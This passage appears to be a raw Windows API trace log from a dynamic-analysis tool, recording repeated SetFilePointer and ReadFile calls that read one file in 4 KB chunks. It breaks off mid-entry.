[0088.404] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x13000 [0088.404] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.404] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x14000 [0088.404] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.405] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x15000 [0088.405] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.405] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x16000 [0088.406] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.406] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x17000 [0088.406] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.406] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x18000 [0088.406] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.407] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x19000 [0088.407] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.408] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1a000 [0088.408] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.408] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1b000 [0088.408] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.409] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1c000 [0088.409] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.409] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1d000 [0088.409] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.410] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1e000 [0088.410] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.410] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1f000 [0088.410] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.411] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x20000 [0088.411] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.411] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x21000 [0088.411] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.412] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x22000 [0088.412] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.413] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x23000 [0088.413] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.413] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x24000 [0088.413] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.414] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x25000 [0088.414] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.414] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x26000 [0088.414] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.414] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x27000 [0088.414] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.415] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x28000 [0088.415] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.415] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x29000 [0088.415] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.416] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2a000 [0088.417] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.417] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2b000 [0088.417] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.418] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2c000 [0088.418] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.418] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2d000 [0088.418] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.418] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2e000 [0088.419] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.419] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2f000 [0088.419] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.419] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x30000 [0088.419] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.421] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x31000 [0088.421] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.421] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x32000 [0088.421] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.422] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x33000 [0088.422] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.422] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x34000 [0088.422] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.423] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x35000 [0088.423] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.423] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x36000 [0088.423] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.423] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x37000 [0088.424] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.424] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x38000 [0088.424] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.425] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x39000 [0088.425] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.425] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3a000 [0088.425] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.426] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3b000 [0088.426] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.426] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3c000 [0088.426] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.427] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3d000 [0088.427] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.427] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3e000 [0088.427] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.428] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3f000 [0088.428] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.428] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x40000 [0088.428] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.430] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x41000 [0088.431] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x42000 [0088.431] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x43000 [0088.431] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x44000 [0088.431] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.432] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x45000 [0088.432] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.432] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x46000 [0088.432] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.433] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x47000 [0088.433] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.433] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x48000 [0088.433] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.434] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x49000 [0088.434] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.434] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x4a000 [0088.434] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.435] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: 